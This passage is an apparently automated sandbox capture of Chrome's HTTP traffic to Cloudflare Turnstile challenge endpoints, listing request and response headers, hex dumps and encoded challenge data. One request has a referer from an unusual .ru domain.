                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                    Sec-Fetch-Dest: image
                                                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/zv890/0x4AAAAAAA0NHG15_jVuz6XI/auto/fbE/normal/auto/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:35:55 UTC200INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 14 Jan 2025 17:35:55 GMT
                                                                                                    Content-Type: image/png
                                                                                                    Content-Length: 61
                                                                                                    Connection: close
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 901f62a52e6e1861-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    2025-01-14 17:35:55 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 13 00 00 00 16 08 02 00 00 00 ad ff 30 28 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                    Data Ascii: PNGIHDR0(IDAT$IENDB`


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    23192.168.2.556445104.18.94.414437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:35:56 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/901f629158744368/1736876154281/IuOmzKH2y67OPFE HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:35:56 UTC200INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 14 Jan 2025 17:35:56 GMT
                                                                                                    Content-Type: image/png
                                                                                                    Content-Length: 61
                                                                                                    Connection: close
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 901f62a90b5b0f73-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    2025-01-14 17:35:56 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 13 00 00 00 16 08 02 00 00 00 ad ff 30 28 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                    Data Ascii: PNGIHDR0(IDAT$IENDB`


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    24192.168.2.556451104.18.94.414437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:35:57 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/901f629158744368/1736876154284/ec57144d90bb744d1c02edc23d2623a0823523ab9016e4cd96b09d4bae1b2468/bC7VENOcp4MpmX5 HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    Cache-Control: max-age=0
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/zv890/0x4AAAAAAA0NHG15_jVuz6XI/auto/fbE/normal/auto/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:35:57 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                    Date: Tue, 14 Jan 2025 17:35:57 GMT
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    Content-Length: 1
                                                                                                    Connection: close
                                                                                                    2025-01-14 17:35:57 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 37 46 63 55 54 5a 43 37 64 45 30 63 41 75 33 43 50 53 59 6a 6f 49 49 31 49 36 75 51 46 75 54 4e 6c 72 43 64 53 36 34 62 4a 47 67 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                    Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g7FcUTZC7dE0cAu3CPSYjoII1I6uQFuTNlrCdS64bJGgAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                    2025-01-14 17:35:57 UTC1INData Raw: 4a
                                                                                                    Data Ascii: J


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    25192.168.2.556457104.18.94.414437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:35:58 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1228627879:1736874980:owDbRf1JMQLzSAAsYvB4RBCQLQ8PykMmZK59qzc4AFE/901f629158744368/WGOW0ZmnxUg9b29m4TdFJM.YSuViBt66WvIZB07wG0o-1736876152-1.1.1.1-EGtzERGKxVfB3AFLRIXjJCckMdBjWlaaS6RRvK9sK9rsGZSeX_ac15Nm8sKO58f3 HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    Content-Length: 32329
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    Content-type: application/x-www-form-urlencoded
                                                                                                    CF-Chl-RetryAttempt: 0
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    CF-Challenge: WGOW0ZmnxUg9b29m4TdFJM.YSuViBt66WvIZB07wG0o-1736876152-1.1.1.1-EGtzERGKxVfB3AFLRIXjJCckMdBjWlaaS6RRvK9sK9rsGZSeX_ac15Nm8sKO58f3
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: */*
                                                                                                    Origin: https://challenges.cloudflare.com
                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/zv890/0x4AAAAAAA0NHG15_jVuz6XI/auto/fbE/normal/auto/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:35:58 UTC16384OUTData Raw: 76 5f 39 30 31 66 36 32 39 31 35 38 37 34 34 33 36 38 3d 7a 4a 45 30 4b 43 79 69 31 48 4a 57 4a 57 68 4a 79 73 79 48 49 71 6d 69 55 58 57 4f 57 33 30 79 35 33 55 52 57 42 6a 30 73 4a 79 36 51 57 4b 30 46 45 55 76 57 48 50 78 57 7a 35 79 54 45 57 7a 43 57 79 7a 65 57 69 49 31 57 5a 57 43 33 35 57 78 30 6c 48 35 72 46 57 79 69 57 6d 78 71 57 69 54 2d 71 55 69 59 4d 6a 36 45 77 2d 49 67 4e 70 33 43 66 57 76 71 79 52 55 37 67 57 55 48 56 6c 30 6c 49 57 44 77 47 6b 71 71 57 79 77 30 79 63 73 57 57 42 66 6b 69 57 69 52 4e 43 2d 47 48 62 7a 4d 74 37 57 6d 4e 64 57 49 4b 31 58 70 77 57 43 4e 74 64 48 48 45 74 2d 2d 30 57 35 68 50 65 45 37 43 73 2d 6b 30 57 71 64 55 67 79 79 6a 38 53 61 61 67 72 70 4a 77 75 5a 37 57 6b 49 38 53 58 49 34 54 50 50 53 43 4a 63 74 71
                                                                                                    Data Ascii: v_901f629158744368=zJE0KCyi1HJWJWhJysyHIqmiUXWOW30y53URWBj0sJy6QWK0FEUvWHPxWz5yTEWzCWyzeWiI1WZWC35Wx0lH5rFWyiWmxqWiT-qUiYMj6Ew-IgNp3CfWvqyRU7gWUHVl0lIWDwGkqqWyw0ycsWWBfkiWiRNC-GHbzMt7WmNdWIK1XpwWCNtdHHEt--0W5hPeE7Cs-k0WqdUgyyj8SaagrpJwuZ7WkI8SXI4TPPSCJctq
                                                                                                    2025-01-14 17:35:58 UTC15945OUTData Raw: 79 56 45 46 52 6f 2d 46 45 6d 70 51 47 51 71 57 47 30 66 57 45 30 79 71 79 2b 57 65 57 66 69 6c 33 79 75 57 6f 2d 43 35 57 68 24 48 30 6d 38 6c 36 57 6a 30 73 33 57 6a 57 45 45 57 35 79 2d 31 49 71 73 75 57 67 57 71 59 73 33 79 4e 57 55 71 43 68 79 51 57 47 71 6d 68 79 55 57 37 57 79 36 24 78 57 35 4f 59 65 57 39 57 37 57 6d 33 55 4f 78 47 2b 33 73 57 46 33 76 57 55 6c 61 33 4a 43 33 6c 4b 30 73 57 37 36 57 73 30 6b 57 54 4a 57 74 2d 6b 48 48 57 57 69 79 4d 57 45 2d 73 49 57 32 57 44 71 57 4a 57 79 57 6d 33 43 43 79 7a 57 79 68 55 45 57 36 57 4f 38 36 59 57 58 57 4b 30 70 4a 57 32 57 78 30 46 4a 43 79 57 39 56 52 73 55 36 57 59 71 6c 35 55 58 57 41 36 73 4a 55 32 57 62 30 70 4a 55 6c 57 2d 30 70 75 55 2d 57 50 71 70 48 57 4e 57 38 71 70 49 55 79 57 50 30
                                                                                                    Data Ascii: yVEFRo-FEmpQGQqWG0fWE0yqy+WeWfil3yuWo-C5Wh$H0m8l6Wj0s3WjWEEW5y-1IqsuWgWqYs3yNWUqChyQWGqmhyUW7Wy6$xW5OYeW9W7Wm3UOxG+3sWF3vWUla3JC3lK0sW76Ws0kWTJWt-kHHWWiyMWE-sIW2WDqWJWyWm3CCyzWyhUEW6WO86YWXWK0pJW2Wx0FJCyW9VRsU6WYql5UXWA6sJU2Wb0pJUlW-0puU-WPqpHWNW8qpIUyWP0
                                                                                                    2025-01-14 17:35:58 UTC322INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 14 Jan 2025 17:35:58 GMT
                                                                                                    Content-Type: text/plain; charset=UTF-8
                                                                                                    Content-Length: 26332
                                                                                                    Connection: close
                                                                                                    cf-chl-gen: Fqc/DIkdNZgo1yYrq7KmGOijeUElmZm1IJbY17khBKW/RJqWjRYTzki79ECq2IbT$Nex0/wFC+56bZjnPqElf1g==
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 901f62b4f9184375-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    2025-01-14 17:35:58 UTC1047INData Raw: 6c 45 70 70 61 6c 42 6b 69 31 52 76 6a 5a 75 64 65 59 32 43 58 4a 53 58 58 70 75 6a 5a 33 4f 66 70 32 70 2f 5a 36 5a 75 6e 6f 53 30 71 59 2b 67 72 62 46 32 69 5a 75 77 72 4b 6d 65 6a 5a 65 77 6f 4b 4b 38 68 62 75 2f 6e 37 66 44 72 5a 75 76 77 71 4c 49 73 72 54 48 7a 61 58 4f 77 72 69 6d 32 63 66 55 31 4d 36 61 32 4e 69 61 75 4c 79 34 34 73 6a 61 75 2b 66 6b 32 4d 37 66 7a 73 50 4b 79 65 37 6b 79 4d 33 6f 34 75 75 78 30 76 76 50 75 64 4d 42 30 74 37 50 2b 2f 36 39 42 2f 37 48 78 50 72 70 31 39 6e 6f 36 4d 37 46 42 77 58 72 37 51 6b 48 39 2b 66 6b 33 4f 63 62 46 41 4d 44 46 65 44 76 46 66 58 78 47 79 63 72 39 66 76 39 35 78 30 67 42 77 49 74 38 69 73 7a 4c 43 55 6e 47 2f 51 58 47 42 38 33 49 79 73 69 49 78 77 78 4e 7a 6c 4b 43 41 6f 49 4b 77 6f 34 45 43 5a
                                                                                                    Data Ascii: lEppalBki1RvjZudeY2CXJSXXpujZ3Ofp2p/Z6ZunoS0qY+grbF2iZuwrKmejZewoKK8hbu/n7fDrZuvwqLIsrTHzaXOwrim2cfU1M6a2NiauLy44sjau+fk2M7fzsPKye7kyM3o4uux0vvPudMB0t7P+/69B/7HxPrp19no6M7FBwXr7QkH9+fk3OcbFAMDFeDvFfXxGycr9fv95x0gBwIt8iszLCUnG/QXGB83IysiIxwxNzlKCAoIKwo4ECZ
                                                                                                    2025-01-14 17:35:58 UTC1369INData Raw: 35 65 71 47 67 6a 4a 32 46 6f 70 2b 49 68 36 47 6a 6b 4b 71 45 6f 4b 61 31 6b 5a 65 59 6e 4c 36 53 64 72 4b 73 6f 37 36 2b 78 4a 75 65 68 35 32 6b 6f 62 61 4e 6a 38 72 4e 71 4a 32 72 6b 37 4b 77 79 73 36 31 6c 72 50 65 76 72 6d 30 34 64 6a 4c 75 70 79 32 7a 37 2b 2f 33 74 33 48 35 4e 7a 62 38 4f 66 6b 37 62 54 31 31 64 58 72 39 63 65 33 78 4f 72 7a 33 75 37 51 32 4d 32 2f 78 64 2f 67 39 64 49 49 76 65 4c 67 37 73 33 4e 43 41 30 54 45 52 58 49 39 51 58 77 34 74 58 77 30 77 37 58 41 65 37 73 34 79 58 32 2b 69 66 6c 4b 66 4c 64 34 69 4d 45 4d 4f 63 73 4a 67 67 79 43 2b 77 75 4e 2f 55 49 39 6a 51 57 44 45 41 4b 4d 6a 34 69 4d 52 30 6c 46 79 52 48 4a 44 55 6f 48 43 41 47 4d 51 51 65 4a 30 55 7a 44 69 59 7a 45 69 6f 36 57 6a 38 58 57 7a 34 35 56 42 70 67 50 56
                                                                                                    Data Ascii: 5eqGgjJ2Fop+Ih6GjkKqEoKa1kZeYnL6SdrKso76+xJueh52kobaNj8rNqJ2rk7Kwys61lrPevrm04djLupy2z7+/3t3H5Nzb8Ofk7bT11dXr9ce3xOrz3u7Q2M2/xd/g9dIIveLg7s3NCA0TERXI9QXw4tXw0w7XAe7s4yX2+iflKfLd4iMEMOcsJggyC+wuN/UI9jQWDEAKMj4iMR0lFyRHJDUoHCAGMQQeJ0UzDiYzEio6Wj8XWz45VBpgPV
                                                                                                    2025-01-14 17:35:58 UTC1369INData Raw: 6f 48 36 47 69 57 36 6f 62 62 4b 31 64 49 4b 4b 64 4c 79 62 69 5a 2b 74 71 71 35 38 74 63 50 46 6f 36 54 47 6c 34 6e 48 68 4b 4b 70 6d 36 47 61 71 63 50 50 6f 61 71 74 70 64 44 56 7a 63 75 33 6b 4c 47 62 72 62 37 58 76 39 36 2b 75 62 43 6d 31 64 79 71 70 71 65 72 75 73 50 42 7a 61 33 79 30 4f 48 78 2b 63 50 32 73 37 33 57 41 65 76 71 38 2b 50 4e 39 67 58 31 32 38 4c 49 35 75 6a 45 36 51 51 4c 44 65 4c 66 38 77 62 75 43 66 67 53 35 51 6f 50 39 65 63 4e 36 50 67 62 34 4e 30 55 4a 68 7a 35 38 77 41 63 47 2f 6a 35 4c 75 37 70 2f 51 30 41 4e 41 4c 30 4e 54 55 78 45 43 67 75 46 7a 45 68 4f 77 77 78 49 50 77 53 2f 53 4e 44 52 44 51 59 47 44 64 51 45 54 41 6f 4b 53 41 4f 44 6c 5a 59 55 56 67 31 4f 6b 38 70 4f 45 45 78 56 44 59 77 58 7a 6f 67 53 6c 70 45 4f 7a 67
                                                                                                    Data Ascii: oH6GiW6obbK1dIKKdLybiZ+tqq58tcPFo6TGl4nHhKKpm6GaqcPPoaqtpdDVzcu3kLGbrb7Xv96+ubCm1dyqpqerusPBza3y0OHx+cP2s73WAevq8+PN9gX128LI5ujE6QQLDeLf8wbuCfgS5QoP9ecN6Pgb4N0UJhz58wAcG/j5Lu7p/Q0ANAL0NTUxECguFzEhOwwxIPwS/SNDRDQYGDdQETAoKSAODlZYUVg1Ok8pOEExVDYwXzogSlpEOzg
                                                                                                    2025-01-14 17:35:58 UTC1369INData Raw: 4b 75 51 6b 4c 6d 4d 69 58 4f 47 71 4c 70 37 6f 48 32 65 66 58 71 65 78 49 53 2f 6b 71 71 47 79 62 79 65 68 73 2b 67 77 73 65 4c 6b 70 50 52 6f 4e 53 55 6f 36 62 58 74 4d 36 70 73 4c 7a 53 7a 65 57 59 31 4d 4f 6e 74 4f 6a 4d 71 4d 4b 34 35 38 53 72 37 2b 6e 6a 73 65 50 58 36 37 6a 6d 39 66 54 6d 2b 2f 45 41 33 38 7a 2b 31 76 36 35 43 4c 2f 79 34 75 77 43 44 41 6f 50 37 38 6a 4a 44 51 54 68 7a 73 37 34 36 76 72 75 33 64 30 42 32 39 77 57 32 76 33 35 47 68 30 46 34 43 76 30 4a 69 37 6c 41 65 38 64 35 41 51 69 38 68 45 46 42 41 30 74 46 68 6a 32 2b 69 76 33 4e 7a 34 44 39 68 48 2b 48 6b 52 44 2f 43 51 68 44 45 6b 68 4a 6a 73 65 51 53 73 2f 4b 31 64 56 56 6c 63 75 4e 42 77 37 4f 56 4e 58 50 68 38 38 5a 31 6f 2b 4f 43 46 4c 61 69 4e 63 59 45 31 73 4b 79 78 4e
                                                                                                    Data Ascii: KuQkLmMiXOGqLp7oH2efXqexIS/kqqGybyehs+gwseLkpPRoNSUo6bXtM6psLzSzeWY1MOntOjMqMK458Sr7+njsePX67jm9fTm+/EA38z+1v65CL/y4uwCDAoP78jJDQThzs746vru3d0B29wW2v35Gh0F4Cv0Ji7lAe8d5AQi8hEFBA0tFhj2+iv3Nz4D9hH+HkRD/CQhDEkhJjseQSs/K1dVVlcuNBw7OVNXPh88Z1o+OCFLaiNcYE1sKyxN
                                                                                                    2025-01-14 17:35:58 UTC1369INData Raw: 57 56 73 33 53 59 64 70 6e 43 67 72 79 67 74 4c 65 42 6b 34 65 39 68 71 50 4c 6a 59 33 4d 76 73 6d 4d 6c 4d 69 6e 77 35 6a 4a 75 39 43 74 7a 70 71 5a 77 61 36 74 77 70 2b 34 76 75 6d 6d 70 63 66 46 75 4d 54 76 33 2b 57 77 7a 73 36 76 73 4e 6a 32 73 4c 6a 5a 75 72 4f 30 2b 2b 71 36 34 4f 50 39 39 64 2f 67 75 76 66 67 34 65 6b 47 36 64 76 77 2f 74 30 4d 34 67 44 71 45 78 44 33 38 39 4c 5a 2f 65 76 52 37 4f 6e 72 2b 67 34 52 38 53 62 66 41 4f 4d 42 49 68 7a 74 4c 66 73 54 2f 54 4c 75 4d 2f 55 50 4f 6a 50 73 45 78 77 65 2b 52 63 71 50 66 30 2f 48 45 63 42 52 51 4d 44 41 53 45 63 4f 51 67 47 4f 67 30 65 54 79 30 69 45 6c 51 58 47 68 51 30 54 7a 51 56 58 47 49 69 47 6d 42 6d 51 79 55 39 56 6d 6f 72 57 6a 77 6f 4c 44 42 65 4b 54 46 78 53 43 39 44 54 56 52 58 4f
                                                                                                    Data Ascii: WVs3SYdpnCgrygtLeBk4e9hqPLjY3MvsmMlMinw5jJu9CtzpqZwa6twp+4vummpcfFuMTv3+Wwzs6vsNj2sLjZurO0++q64OP99d/guvfg4ekG6dvw/t0M4gDqExD389LZ/evR7Onr+g4R8SbfAOMBIhztLfsT/TLuM/UPOjPsExwe+RcqPf0/HEcBRQMDASEcOQgGOg0eTy0iElQXGhQ0TzQVXGIiGmBmQyU9VmorWjwoLDBeKTFxSC9DTVRXO
                                                                                                    2025-01-14 17:35:58 UTC1369INData Raw: 4f 6c 37 71 63 78 70 37 43 6e 73 43 4b 74 5a 6e 4b 75 5a 71 4c 6d 71 62 46 6f 64 4f 56 6b 62 54 57 31 4b 75 70 30 4a 32 53 6d 74 33 51 33 62 65 59 76 2b 6d 6d 73 73 50 45 76 4c 6e 70 36 61 79 6b 75 38 79 2f 76 2b 58 75 30 66 72 70 73 73 32 77 2f 62 6e 79 41 76 33 65 77 51 58 61 38 74 45 48 33 2b 62 44 44 50 44 6d 7a 67 33 39 37 76 41 55 31 51 48 52 7a 41 72 6f 37 75 66 6e 36 50 50 72 34 75 4c 33 38 76 44 77 2b 66 4c 7a 44 66 72 67 43 44 4c 75 4d 77 73 76 43 79 33 32 49 67 59 33 4a 67 66 33 42 78 4d 79 44 6b 41 43 2f 53 46 44 51 52 67 57 50 51 72 2b 42 30 6f 39 53 69 51 66 48 52 30 66 49 43 41 68 4b 69 56 57 47 43 6f 6f 4b 45 6f 65 47 56 35 57 4a 44 4a 51 51 44 68 71 50 32 49 32 61 6d 34 37 4c 58 4a 48 4a 7a 5a 70 4e 6e 46 35 65 6b 31 54 4e 48 70 35 59 44
                                                                                                    Data Ascii: Ol7qcxp7CnsCKtZnKuZqLmqbFodOVkbTW1Kup0J2Smt3Q3beYv+mmssPEvLnp6ayku8y/v+Xu0frpss2w/bnyAv3ewQXa8tEH3+bDDPDmzg397vAU1QHRzAro7ufn6PPr4uL38vDw+fLzDfrgCDLuMwsvCy32IgY3Jgf3BxMyDkAC/SFDQRgWPQr+B0o9SiQfHR0fICAhKiVWGCooKEoeGV5WJDJQQDhqP2I2am47LXJHJzZpNnF5ek1TNHp5YD
                                                                                                    2025-01-14 17:35:58 UTC1369INData Raw: 6c 4a 50 4a 70 33 2b 57 70 36 53 69 6e 4a 75 67 70 35 2b 66 73 4b 71 69 79 4a 65 6d 71 4b 66 53 72 71 71 37 32 72 43 76 35 62 69 7a 6f 4e 6d 34 76 72 6a 64 33 73 47 38 75 38 43 2f 76 38 2f 48 71 38 50 44 79 4d 7a 48 2f 64 44 4e 7a 4d 76 59 30 73 34 46 77 39 58 54 2b 65 6a 64 32 4f 66 73 34 64 6f 43 36 4f 54 4d 42 76 44 6f 34 68 72 73 36 2b 67 4f 2f 50 4c 72 36 2f 50 58 37 2b 38 66 39 66 49 61 41 66 66 33 39 78 48 36 2b 69 48 76 41 51 41 41 46 51 73 45 4f 68 45 49 43 53 34 52 44 50 67 79 47 52 45 51 4e 69 55 5a 46 52 51 74 48 52 68 4f 49 41 51 62 55 6a 45 66 49 53 41 70 4b 69 51 30 55 79 63 6f 46 68 77 74 4c 53 77 31 4d 43 39 6d 52 54 59 31 57 6a 30 38 4a 56 35 52 50 44 31 4d 56 55 4e 41 64 6b 56 4c 51 32 70 79 4d 45 68 49 61 30 39 4d 63 6c 31 52 54 34 5a
                                                                                                    Data Ascii: lJPJp3+Wp6SinJugp5+fsKqiyJemqKfSrqq72rCv5bizoNm4vrjd3sG8u8C/v8/Hq8PDyMzH/dDNzMvY0s4Fw9XT+ejd2Ofs4doC6OTMBvDo4hrs6+gO/PLr6/PX7+8f9fIaAff39xH6+iHvAQAAFQsEOhEICS4RDPgyGREQNiUZFRQtHRhOIAQbUjEfISApKiQ0UycoFhwtLSw1MC9mRTY1Wj08JV5RPD1MVUNAdkVLQ2pyMEhIa09Mcl1RT4Z
                                                                                                    2025-01-14 17:35:58 UTC1369INData Raw: 63 43 38 7a 4b 53 53 6b 4d 71 4e 7a 59 76 4e 72 64 69 39 31 38 7a 56 6b 39 58 62 34 4d 58 66 31 4e 32 62 34 4c 4f 6c 7a 4b 54 6e 75 4d 62 77 71 65 7a 6a 72 4f 58 54 74 66 54 50 30 37 72 30 31 72 76 4b 79 72 6e 34 42 41 57 39 41 66 66 41 2b 65 54 5a 77 50 7a 4e 41 74 33 39 37 39 49 4e 37 74 55 43 7a 4f 77 52 48 4e 41 58 46 74 77 57 34 65 34 46 32 50 67 69 35 64 77 5a 36 52 7a 35 45 65 72 6a 4b 41 7a 74 49 75 77 76 38 77 38 76 38 66 6b 6e 43 69 6f 63 2f 6a 67 62 41 6a 50 34 4e 51 59 30 46 69 31 43 41 45 4d 6f 43 6a 6f 4a 53 30 73 72 53 67 34 57 4f 53 5a 47 4f 42 74 55 46 68 35 53 46 55 34 65 51 56 39 6d 4f 32 55 32 56 6b 67 72 59 69 59 75 54 57 74 79 52 33 45 70 5a 54 5a 56 63 33 70 4c 65 55 70 71 58 44 39 33 67 55 4a 68 66 34 5a 58 68 54 31 35 53 6d 6d 48
                                                                                                    Data Ascii: cC8zKSSkMqNzYvNrdi918zVk9Xb4MXf1N2b4LOlzKTnuMbwqezjrOXTtfTP07r01rvKyrn4BAW9AffA+eTZwPzNAt3979IN7tUCzOwRHNAXFtwW4e4F2Pgi5dwZ6Rz5EerjKAztIuwv8w8v8fknCioc/jgbAjP4NQY0Fi1CAEMoCjoJS0srSg4WOSZGOBtUFh5SFU4eQV9mO2U2VkgrYiYuTWtyR3EpZTZVc3pLeUpqXD93gUJhf4ZXhT15SmmH


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    26192.168.2.556467104.18.94.414437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:35:59 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1228627879:1736874980:owDbRf1JMQLzSAAsYvB4RBCQLQ8PykMmZK59qzc4AFE/901f629158744368/WGOW0ZmnxUg9b29m4TdFJM.YSuViBt66WvIZB07wG0o-1736876152-1.1.1.1-EGtzERGKxVfB3AFLRIXjJCckMdBjWlaaS6RRvK9sK9rsGZSeX_ac15Nm8sKO58f3 HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:35:59 UTC442INHTTP/1.1 400 Bad Request
                                                                                                    Date: Tue, 14 Jan 2025 17:35:59 GMT
                                                                                                    Content-Type: application/json
                                                                                                    Content-Length: 14
                                                                                                    Connection: close
                                                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                    cf-chl-out: KLx/xrPqcGF4URBgzfobC3Z9RKjAH+z6gFuAcCDpW7z9KpzCdQDxtLxmV0lxu81L4NyvxL6cgXtGwMccWLNEpQ==$KXmLQ+yYQ3QqcNzbb21bGA==
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 901f62baa92441de-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    2025-01-14 17:35:59 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                                                    Data Ascii: {"err":100230}


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    27192.168.2.563867104.18.94.414437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:37:59 UTC796OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/zv890/0x4AAAAAAA0NHG15_jVuz6XI/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                    Sec-Fetch-Dest: iframe
                                                                                                    Referer: https://l4u8.yaalwgyl.ru/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:37:59 UTC1362INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 14 Jan 2025 17:37:59 GMT
